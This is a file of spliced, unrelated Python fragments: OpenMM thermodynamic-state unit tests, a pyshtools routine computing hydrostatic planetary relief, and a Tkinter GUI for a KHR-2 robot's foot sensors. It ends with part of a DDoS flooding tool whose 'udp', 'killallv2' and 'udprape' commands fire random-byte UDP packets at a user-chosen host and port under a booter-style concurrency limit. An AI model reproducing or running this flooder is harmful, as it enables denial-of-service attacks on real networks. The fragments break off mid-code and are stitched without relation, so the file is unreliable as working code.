def check_not_applicable(states, error, context):
for s in states:
with nose.tools.assert_raises_regexp(GlobalParameterError, error):
s.apply_to_context(context)
# Raise error if the Context defines global parameters that are undefined in the state.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds = None
state_suffix.lambda_bonds_mysuffix = None
check_not_applicable([state, state_suffix], 'undefined in this state', context)
# Raise error if the state defines global parameters that are undefined in the Context.
state, state_suffix = self.read_system_state(system)
state_suffix.gamma_mysuffix = 2.0
check_not_applicable([state_suffix], 'Could not find parameter', context)
# Test-precondition: Context parameters are different than the value we'll test.
tested_value = 0.2
for parameter_value in context.getParameters().values():
assert parameter_value != tested_value
# Correctly sets Context's parameters.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds = tested_value
state.gamma = tested_value
state_suffix.lambda_bonds_mysuffix = tested_value
for s in [state, state_suffix]:
s.apply_to_context(context)
for parameter_name, parameter_value in context.getParameters().items():
if parameter_name in s._parameters:
assert parameter_value == tested_value
del context
def test_standardize_system(self):
"""Test method GlobalParameterState.standardize_system."""
system = self.diatomic_molecule_ts.system
standard_value = _GLOBAL_PARAMETER_STANDARD_VALUE # Shortcut.
def check_is_standard(states, is_standard):
for s in states:
for parameter_name in s._get_controlled_parameters(s._parameters_name_suffix):
parameter_value = getattr(s, parameter_name)
err_msg = 'Parameter: {}; Value: {};'.format(parameter_name, parameter_value)
if parameter_value is not None:
assert (parameter_value == standard_value) is is_standard, err_msg
# Test pre-condition: The system is not in the standard state.
system.getForce(0).setGlobalParameterDefaultValue(0, 0.9)
states = self.read_system_state(system)
check_is_standard(states, is_standard=False)
# Check that _standardize_system() sets all parameters to the standard value.
for state in states:
state._standardize_system(system)
states_standard = self.read_system_state(system)
check_is_standard(states_standard, is_standard=True)
def test_find_force_groups_to_update(self):
"""Test method GlobalParameterState._find_force_groups_to_update."""
system = self.diatomic_molecule_force_groups_ts.system
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
# Test cases are (force_groups, force_groups_suffix)
test_cases = [
([0], [0, 0]),
([1], [5, 5]),
([9], [4, 2])
]
for test_case in test_cases:
for i, force_group in enumerate(test_case[0] + test_case[1]):
system.getForce(i).setForceGroup(force_group)
states = self.read_system_state(system)
context = openmm.Context(system, copy.deepcopy(integrator))
# No force group should be updated if we don't change the global parameter.
for state, force_groups in zip(states, test_case):
assert state._find_force_groups_to_update(context, state, memo={}) == set()
# Change the lambdas one by one and check that the method
# recognizes that the force group energy must be updated.
current_state = copy.deepcopy(state)
for parameter_name in state._get_controlled_parameters(state._parameters_name_suffix):
# Check that the system defines the global variable.
parameter_value = getattr(state, parameter_name)
if parameter_value is None:
continue
# Change the current state.
setattr(current_state, parameter_name, parameter_value / 2)
assert state._find_force_groups_to_update(context, current_state, memo={}) == set(force_groups)
setattr(current_state, parameter_name, parameter_value) # Reset current state.
del context
def test_global_parameters_functions(self):
"""Test function variables and global parameter functions work correctly."""
system = copy.deepcopy(self.diatomic_molecule_ts.system)
state = ParameterStateExample.from_system(system)
# Add two function variables to the state.
state.set_function_variable('lambda', 1.0)
state.set_function_variable('lambda2', 0.5)
assert state.get_function_variable('lambda') == 1.0
assert state.get_function_variable('lambda2') == 0.5
# Cannot set a function variable named after a controlled parameter.
with nose.tools.assert_raises(GlobalParameterError):
state.set_function_variable('lambda_bonds', 0.5)
# Assign string global parameter functions to parameters.
state.lambda_bonds = GlobalParameterFunction('lambda')
state.gamma = GlobalParameterFunction('(lambda + lambda2) / 2.0')
assert state.lambda_bonds == 1.0
assert state.gamma == 0.75
# Setting function variables updates global parameter as well.
state.set_function_variable('lambda2', 0)
assert state.gamma == 0.5
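The behavior tested above, a parameter defined as a math expression over named function variables and re-evaluated when a variable changes, can be sketched as follows. This is a hypothetical illustration: the real library parses expressions with a math parser (which is why names like `lambda` are legal there), whereas this sketch uses plain `eval()` and therefore substitutes the non-keyword name `lam`:

```python
import math

# Hypothetical sketch of a global parameter function: a math expression
# over named function variables, re-evaluated on demand.
class ParameterFunction:
    def __init__(self, expression):
        self.expression = expression

    def __call__(self, variables):
        # Expose only selected math functions and the supplied variables.
        namespace = {'__builtins__': {}, 'sqrt': math.sqrt, 'exp': math.exp}
        return eval(self.expression, namespace, dict(variables))

gamma = ParameterFunction('(lam + lam2) / 2.0')
assert gamma({'lam': 1.0, 'lam2': 0.5}) == 0.75
# Changing a function variable changes the evaluated parameter value.
assert gamma({'lam': 1.0, 'lam2': 0.0}) == 0.5
```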
# ---------------------------------------------------
# Integration tests with CompoundThermodynamicStates
# ---------------------------------------------------
def test_constructor_compound_state(self):
"""The GlobalParameterState is set on construction of the CompoundState."""
system = self.diatomic_molecule_ts.system
# Create a system state different than the initial.
composable_states = self.read_system_state(system)
for state in composable_states:
state.set_defined_parameters(0.222)
# CompoundThermodynamicState set the system state in the constructor.
compound_state = CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
new_system_states = self.read_system_state(compound_state.system)
for state, new_state in zip(composable_states, new_system_states):
assert state == new_state
# Trying to set in the constructor undefined global parameters raise an exception.
composable_states[1].gamma_mysuffix = 2.0
err_msg = 'Could not find global parameter gamma_mysuffix in the system.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
def test_global_parameters_compound_state(self):
"""Global parameters setters/getters work in the CompoundState system."""
composable_states = self.read_system_state(self.diatomic_molecule_ts.system)
for state in composable_states:
state.set_defined_parameters(0.222)
compound_state = CompoundThermodynamicState(self.diatomic_molecule_ts, composable_states)
# Defined properties can be assigned and read, unless
i in range(1, ilith+1):
if m == 0:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p402020
elif m == 1:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p412021
elif m == 2:
b4[0, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[0, l, m] * p422022
# --- do sine term ---
b = np.zeros(ilith+2)
if m != 0:
# Add contributions from degree 2 relief to degree 4.
if l == 4 and m <= 2:
b[1:ilith+1] = b4[1, m, 1:ilith+1]
for i in range(1, ilith+1):
b[i] -= gm * cminus[1, l, m] * (radius[i] / r_surface)**l \
/ r_surface
b[ilith+1] = gm * potential.coeffs[1, l, m] / r_ref - \
gm * cplus[1, l, m] * (r_surface / r_ref)**l / r_ref
# solve the linear equation A h = b
atemp = a.copy()
if tides:
for i in range(1, ilith+1):
atemp[i, i] += atides[1, i]
btemp = b.copy()
# note that the zero index is not used
lu, piv, x, info = lapack.dgesv(atemp[1:, 1:], btemp[1:])
if info != 0:
raise RuntimeError("lapack.dgesv did not exit properly: {:d}".format(info))
for i in range(1, ilith+1):
hlm[i].coeffs[1, l, m] = x[i-1]
# calculate b4 contribution
if l == 2:
for i in range(1, ilith+1):
if m == 1:
b4[1, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[1, l, m] * p412021
elif m == 2:
b4[1, m, i] = 2. / 3. / np.sqrt(5.) * \
omega**2 * radius[i] * \
hlm[i].coeffs[1, l, m] * p422022
# Calculate potential at r_ref resulting from all interfaces below and
# including ilith
coeffs = np.zeros((2, lmax+1, lmax+1))
for i in range(1, ilith+1):
for l in range(1, lmax+1):
coeffs[:, l, :l+1] += hlm[i].coeffs[:, l, :l+1] * 4. * \
np.pi * drho[i] * radius[i]**2 * (radius[i] / r_ref)**l * \
g / gm / (2. * l + 1.)
clm_hydro = pysh.SHGravCoeffs.from_array(coeffs, gm=gm, r0=r_ref,
omega=omega)
return hlm, clm_hydro, mass_model
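The cumulative mass profile used by these routines is accumulated shell by shell, with each shell contributing 4 pi (r_i^3 - r_{i-1}^3) rho / 3. A quick numerical sanity check (standalone sketch with made-up values) confirms the shell sums telescope to the closed-form uniform-sphere mass:

```python
import numpy as np

# Sanity check of the shell-mass accumulation used in these routines:
# summed shell masses of a uniform-density body equal (4/3) pi R^3 rho.
radius = np.linspace(0.0, 1.0e6, 51)   # 50 shells out to R = 1000 km
rho = 3000.0                           # uniform density, kg/m^3
mass = np.zeros(len(radius))
for i in range(1, len(radius)):
    mass[i] = mass[i-1] + 4.0 * np.pi * \
        (radius[i]**3 - radius[i-1]**3) * rho / 3.0
expected = 4.0 / 3.0 * np.pi * radius[-1]**3 * rho
# The r^3 differences telescope, so agreement is exact up to rounding.
assert abs(mass[-1] - expected) / expected < 1e-12
```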
def HydrostaticShape(radius, rho, omega, gm, r_ref, rp=None, mp=None,
i_clm_hydro=None):
"""
Calculate the shape of hydrostatic relief in a rotating planet or moon,
along with the total gravitation potential. For the case of a moon in
synchronous rotation, optionally include the tidal potential.
Returns
-------
hlm : array of SHCoeffs class instances, size(n+1)
Array of SHCoeffs class instances of the spherical harmonic
coefficients of the hydrostatic relief at each interface.
clm_hydro : SHCoeffs class instance containing the gravitational potential
resulting from all hydrostatic interfaces. If i_clm_hydro is specified,
then the potential will include only interfaces beneath index
i_clm_hydro.
mass : float
Total mass of the planet, assuming a spherical shape and the provided
1D density profile.
Parameters
----------
radius : ndarray, float, size(n+1)
Radius of each density interface, where index 0 corresponds to the
center of the planet and n corresponds to the surface.
rho : ndarray, float, size(n+1)
Density of layer i between radius[i] and radius[i+1]. The density
at index 0 is from the center of the planet to radius[1], whereas
the density at index n should be zero.
omega : float
Angular rotation rate of the planet.
gm : float
GM of the planet.
r_ref : float
Reference radius for output potential coefficients.
rp : float, optional, default = None
If specified, include the tidal potential acting on a synchronously
rotating moon, where rp is the average distance between the planet
and satellite.
mp : float, optional, default = None
The mass of the host planet, at a distance rp from the satellite.
i_clm_hydro : int, optional, default = None
If specified, calculate the gravitational potential clm_hydro resulting
from all interfaces below and including the radius index i_clm_hydro.
"""
tides = False
if rp is not None:
if mp is None:
raise ValueError('When including tides, both rp and mp must be ' +
'specified.')
tides = True
if mp is not None:
if rp is None:
raise ValueError('When including tides, both rp and mp must be ' +
'specified.')
tides = True
if len(radius) != len(rho):
raise ValueError('Length of radius and rho must be the same. '
'len(radius) = {:d}. len(rho) = {:d}.'
.format(len(radius), len(rho)))
n = len(radius) - 1 # index of surface
lmax = 4
g = pysh.constants.G.value
hlm = [pysh.SHCoeffs.from_zeros(lmax) for i in range(n+1)]
clm_hydro = pysh.SHCoeffs.from_zeros(lmax)
for i in range(n+1):
hlm[i].coeffs[0, 0, 0] = radius[i]
# First determine the spherical harmonic coefficients of (Y20 Ylm)
# and for tides, (Y22 Ylm). We are only concerned with the coefficient
# that corresponds to lm, so for each lm, store only the lm component in
# the array cp20 and cp22.
sh20 = np.zeros((2, lmax+1, lmax+1))
sh22 = np.zeros((2, lmax+1, lmax+1))
sh = np.zeros((2, lmax+1, lmax+1))
cp20 = np.zeros((2, lmax+1, lmax+1))
cp22 = np.zeros((2, lmax+1, lmax+1))
sh20[0, 2, 0] = 1. # Y20
sh22[0, 2, 2] = 1. # Y22
for l in range(2, lmax+1):
for m in range(0, l+1):
sh[0, l, m] = 1.
coeffs = pysh.expand.SHMultiply(sh20, sh)
cp20[0, l, m] = coeffs[0, l, m]
if m != 0:
cp20[1, l, m] = cp20[0, l, m]
if l == 2 and m == 0:
p402020 = coeffs[0, 4, 0]
if l == 2 and m == 1:
p412021 = coeffs[0, 4, 1]
if l == 2 and m == 2:
p422022 = coeffs[0, 4, 2]
coeffs = pysh.expand.SHMultiply(sh22, sh)
cp22[0, l, m] = coeffs[0, l, m]
sh[0, l, m] = 0.
if m > 0:
sh[1, l, m] = 1.
coeffs = pysh.expand.SHMultiply(sh22, sh)
cp22[1, l, m] = coeffs[1, l, m]
sh[1, l, m] = 0.
# Calculate delta_rho
drho = np.zeros(n+1)
mass = np.zeros(n+1)
for i in range(1, n+1):
drho[i] = rho[i-1] - rho[i]
# Calculate matrix A and invert for relief.
a = np.zeros((n+1, n+1))
atides = np.zeros((2, n+1))
b4 = np.zeros((2, 3, n+1))
# Calculate cumulate mass function
for i in range(1, n+1):
if i == 1:
mass[1] = 4. * np.pi * radius[1]**3 * rho[0] / 3.
else:
mass[i] = mass[i-1] + 4. * np.pi * \
(radius[i]**3 - radius[i-1]**3) * rho[i-1] / 3.
mass_model = mass[n]
for l in range(2, lmax+1, 2):
for m in range(0, lmax+1):
for i in range(1, n+1): # zero index not computed
for j in range(1, n+1):
if i == j: # cp20 for sin and cosine terms are equal
a[i, j] = 4. * np.pi * g * drho[i] * radius[i] / \
(2. * l + 1.) - g * mass[i] / radius[i]**2 + \
(2./3.) * radius[i] * omega**2 * \
(1. - cp20[0, l, m] / np.sqrt(5.0))
elif j < i:
a[i, j] = 4. * np.pi * g * drho[j] * radius[j] * \
(radius[j] / radius[i])**(l+1) / (2. * l + 1.)
else:
a[i, j] = 4. * np.pi * g * drho[j] * radius[i] * \
(radius[i] / radius[j])**(l-1) / (2. * l + 1.)
if tides is True:
atides[0, i] = g * mp * radius[i] / rp**3 * (
- np.sqrt(5.) / 5. * cp20[0, l, m] +
np.sqrt(12./5.) * cp22[0, l, m] / 2.)
atides[1, i] = g * mp * radius[i] / rp**3 * (
- np.sqrt(5.) / 5. * cp20[1, l, m] +
np.sqrt(12./5.) * cp22[1, l, m] / 2.)
# --- do cosine term ---
b = np.zeros(n+1)
if l == 2 and m == 0:
for i in range(1, n+1):
b[i] = (omega * radius[i])**2 / (3. * np.sqrt(5.))
if tides:
b[i] += g * mp * radius[i]**2 / rp**3 * \
np.sqrt(5.) / 10.
if l == 2 and m == 2 and tides:
for i in range(1,
################################################################################
#
# GuiWinKHR2Feet
#
""" Graphical User Interface KHR-2 BrainPack Feet Window
Graphical User Interface (GUI) Tkinter window displays current
RoadNarrows BrainPack feet sensor data, plus simple display options.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2006.10.21
Copyright (C) 2007. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
import sys
import socket
import errno
import time
import math
import random
import tkinter as tk
import Fusion.Core.Values as Values
import Fusion.Utils.IVTimer as IVTimer
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiUtils as gut
import Fusion.Gui.GuiToolTip as GuiToolTip
import Fusion.Gui.GuiMenuBar as GuiMenuBar
import Fusion.Gui.GuiStatusBar as GuiStatusBar
import Fusion.Gui.GuiDlgAbout as GuiDlgAbout
import Fusion.Gui.GuiDlgSaveAs as GuiDlgSaveAs
import Fusion.Gui.GuiWin as GuiWin
import Fusion.KHR2.Cmd.BsProxyClient as BsProxyClient
import Fusion.KHR2.Gui.GuiDlgKHR2Proxy as GuiDlgKHR2Proxy
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
# BrainPack Data Classes
BpDataClassRaw = 0
BpDataClassCooked = 1
# BrainPack Feet
BpFeet = ['bpfoot_left', 'bpfoot_right'] # keys
BpFootSensorMax = 255 # max. sensor data value
BpFootSensorMask = 0x00ff # sensor mask
BpFootVecMagMax = 858 # max calc'd vector length
BpFootWidth = 32.5 # mm from left to right sensor columns
BpFootHeight = 86.0 # mm from top to bottom sensor rows
BpFootPtFulcrum = (BpFootWidth/2.0, BpFootHeight/2.0)
# point fulcrum position at center of foot
BpFootNumOfSoleSensors = 6
BpFootNumOfToeSensors = 2
BpFootNumOfFootSensors = BpFootNumOfSoleSensors + BpFootNumOfToeSensors
# foot sensor index order
BpFootSensorUppL = 0 # foot upper left
BpFootSensorUppR = 1 # foot upper right
BpFootSensorMidL = 2 # foot middle left
BpFootSensorMidR = 3 # foot middle right
BpFootSensorLowL = 4 # foot lower left
BpFootSensorLowR = 5 # foot lower right
BpFootSensorToeL = 6 # foot toe left
BpFootSensorToeR = 7 # foot toe right
# feet canvas dimensions
_EdgeLeft = 15 # left edge margin
_EdgeTop = 10 # top edge margin
_EdgeBottom = 15 # bottom edge margin
_EdgeRight = 15 # right edge margin
# minimum size
_CanvasMinWidth = 400 + _EdgeLeft + _EdgeRight
_CanvasMinHeight = 400 + _EdgeTop + _EdgeBottom
twopi = math.pi * 2.0
#--
def HSVtoRGB(h, s, v):
""" Convert Hue-Saturation-Value into Red-Green-Blue equivalent.
Parameters:
h - Hue between [0.0, 360.0) degrees. red(0.0) to violet(360.0-).
s - Saturation [0.0, 1.0]
v - Value [0.0, 1.0]
Return Value:
(r, g, b) 3-tuple with each color between [0, 255]
"""
# achromatic (grey)
if s == 0.0:
r = g = b = int(v * 255)
return (r, g, b)
# sector 0 to 5
h /= 60.0
i = int(h) # hue whole part
f = h - i # hue fraction part of h
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f ))
if i == 0:
r = int(v * 255.0)
g = int(t * 255.0)
b = int(p * 255.0)
elif i == 1:
r = int(q * 255.0)
g = int(v * 255.0)
b = int(p * 255.0)
elif i == 2:
r = int(p * 255.0)
g = int(v * 255.0)
b = int(t * 255.0)
elif i == 3:
r = int(p * 255.0)
g = int(q * 255.0)
b = int(v * 255.0)
elif i == 4:
r = int(t * 255.0)
g = int(p * 255.0)
b = int(v * 255.0)
else: # sector 5
r = int(v * 255.0)
g = int(p * 255.0)
b = int(q * 255.0)
return (r, g, b)
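The sector arithmetic above matches the conversion in Python's stdlib colorsys module, which takes hue in [0.0, 1.0) rather than degrees; a quick cross-check:

```python
import colorsys

# Cross-check the sector math against the stdlib implementation.
# colorsys takes h, s, v all in [0.0, 1.0], so divide the hue by 360.
def hsv_to_rgb255(h_degrees, s, v):
    r, g, b = colorsys.hsv_to_rgb(h_degrees / 360.0, s, v)
    return int(r * 255), int(g * 255), int(b * 255)

assert hsv_to_rgb255(0.0, 1.0, 1.0) == (255, 0, 0)    # pure red
assert hsv_to_rgb255(120.0, 1.0, 1.0) == (0, 255, 0)  # pure green
assert hsv_to_rgb255(240.0, 1.0, 1.0) == (0, 0, 255)  # pure blue
```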
#--
def ColorMap(val, max):
""" Map a sensor value in [0, max] to a '#rrggbb' blue that darkens and
greys out at low values. """
f = float(val) / float(max+1) # [0.0, 1.0)
#hue = 240.0 - 180.0 * f # blue(0) to yellow(max)
hue = 240.0
value = 0.3 + 0.7 * f # dark to light
#value = 1.0
#value = 1.0 - 0.5 * f # light to dark
sat = 0.1 + 0.9 * f # grey to pure
#sat = 1.0 - 0.25 * f # pure to grey
return "#%02x%02x%02x" % HSVtoRGB(hue, sat, value)
#--
def PsychoColorMap(val, max):
""" Map a sensor value in [0, max] linearly across the 24-bit RGB space. """
base = 0x03
color = base + val * (0xffffff // max) # integer divide (Python 3)
strcolor = "#%02x%02x%02x" % ((color>>16)&0xff, (color>>8)&0xff, color&0xff)
return strcolor
#-------------------------------------------------------------------------------
# CLASS: GuiWinKHR2Feet
#-------------------------------------------------------------------------------
class GuiWinKHR2Feet(GuiWin.GuiWin):
""" GUI Window vKHR2 Feet Log Visualizer Class """
#--
def __init__(self, parent, **options):
""" Initialize the vKHR2 Feet Window.
Parameters:
parent - GUI parent of this window
options - Feet options. Options are:
auto=<bool> - do [not] automatically update
**winoptions - GuiWin core options
"""
# first initializations
self.Init(**options)
# create the window
options[Values.FusionCWinKeyTitle] = \
'vKHR2 RoadNarrows BrainPack Feet Visualizer'
GuiWin.GuiWin.__init__(self, parent, **options)
def _initMenuBar(self):
""" Initialize menubar. """
# File menubar items
self.mMenuBar.AddMenuItem('File', 'cascade', owner='root')
self.mMenuBar.AddMenuItem('File|Log...', 'command', owner='root',
command=self.CbLogData)
self.mMenuBar.AddMenuItem('File|Exit', 'command', owner='root',
command=self.destroy)
self.mMenuBar.AddMenuItem('Tools', 'cascade', owner='root')
self.mMenuBar.AddMenuItem('Tools|Configure...',
'command', owner='root', command=self.CbCfgBsProxy)
self.mMenuBar.AddMenuItem('Tools|IDs',
'command', owner='root', command=self.CbFootIds)
self.mMenuBar.AddMenuItem('Tools|Calibrate',
'command', owner='root', command=self.CbFootCal)
self.mMenuBar.AddMenuItem('Tools', 'separator')
self.mMenuBar.AddMenuItem('Tools|I' + gt.UniSuperscript['2']+'C Scan...',
'command', owner='root', command=self.CbI2CScan)
self.mMenuBar.AddMenuItem('Tools', 'separator')
self.mMenuBar.AddMenuItem('Tools|Test Gui',
'command', owner='root', command=self.CbTestGui)
#--
def Init(self, **options):
""" First initializations.
Parameters:
vKHR2 - vKHR2 object.
options - feet input options.
Return Value:
None
"""
# defaults
self.mIsAutoMode = False
self.mDataClass = BpDataClassRaw
self.mBsClient = BsProxyClient.BsProxyClient()
self.mBpFootState = {'bpfoot_left':False, 'bpfoot_right':False}
self.mI2CDevName = '/dev/i2c/0' # default for KoreBot
self.mTestGui = False
# set options from input parameters
for k,v in options.items():
if k == 'auto':
if v:
self.mIsAutoMode = True
else:
self.mIsAutoMode = False
elif k == 'data_class':
self.mDataClass = v
# locals
self.mIvtPull = IVTimer.IVTimer(1.50, 0.25, self.IVClient, once=True)
self.mIvtPull.start()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# GuiWin Overrides
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def body(self):
""" Initialize the gui window initialization callback. """
# menu bar
self.mMenuBar = GuiMenuBar.GuiMenuBar(self)
# create the widgets
self.GuiBody(self)
# refresh the feet canvas
self.FeetCanvasRefresh()
# add menu bar
self._initMenuBar()
#--
def show(self):
""" Show the gui window initialization callback. """
# calculate important window and widget dimensions used for resizing
self.CalcDim()
#--
def resize(self, event):
""" Resize callback event. """
geo = gut.geometry(self)
# window size has changed, clear but don't redraw until resizing is done
if geo[gut.W] != self.mWinGeo[gut.W] or geo[gut.H] != self.mWinGeo[gut.H]:
self.mWinGeo = geo
self.FeetCanvasClearFeet()
width = geo[gut.W] - self.mWinBorder
height = geo[gut.H] - self.mWinBorder - self.mCtlPanelFrameHeight
self.mFeetCanvas.configure(width=width, height=height)
self.FeetCanvasParams(width, height)
width = geo[gut.W] - self.mWinStatusBarBorder
self.mStatusBar.configure(width=width)
self.mHasResized = True
# resizing done, now redraw
elif self.mHasResized:
self.FeetCanvasDrawFeet()
self.mHasResized = False
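The resize() callback implements a simple settle-before-redraw pattern: while the window size keeps changing it only clears the canvas, and it redraws once an event arrives with an unchanged size. A minimal standalone sketch (class and attribute names here are illustrative):

```python
# Settle-before-redraw: clear cheaply during an active resize, do the
# expensive redraw only once the geometry stops changing.
class ResizeTracker:
    def __init__(self, w, h):
        self.size = (w, h)
        self.has_resized = False
        self.log = []                    # records actions for illustration

    def on_resize(self, w, h):
        if (w, h) != self.size:          # size changed: clear, defer redraw
            self.size = (w, h)
            self.log.append('clear')
            self.has_resized = True
        elif self.has_resized:           # size settled: redraw exactly once
            self.log.append('redraw')
            self.has_resized = False

t = ResizeTracker(100, 100)
t.on_resize(120, 100)   # still resizing
t.on_resize(140, 100)   # still resizing
t.on_resize(140, 100)   # settled -> redraw
```

This works because Tk delivers a final Configure event with the settled geometry, so the redraw is never skipped.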
#--
def destroy(self):
""" Destroy window callback event. """
GuiWin.GuiWin.destroy(self, auto=self.mIsAutoMode,
data_class=self.mDataClass)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Window Update
# - - - - - - - - - - - - - - - - | |
port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1024
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killallv2":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1460
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killallv3":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1460
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprape":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 20179
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprapev2":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
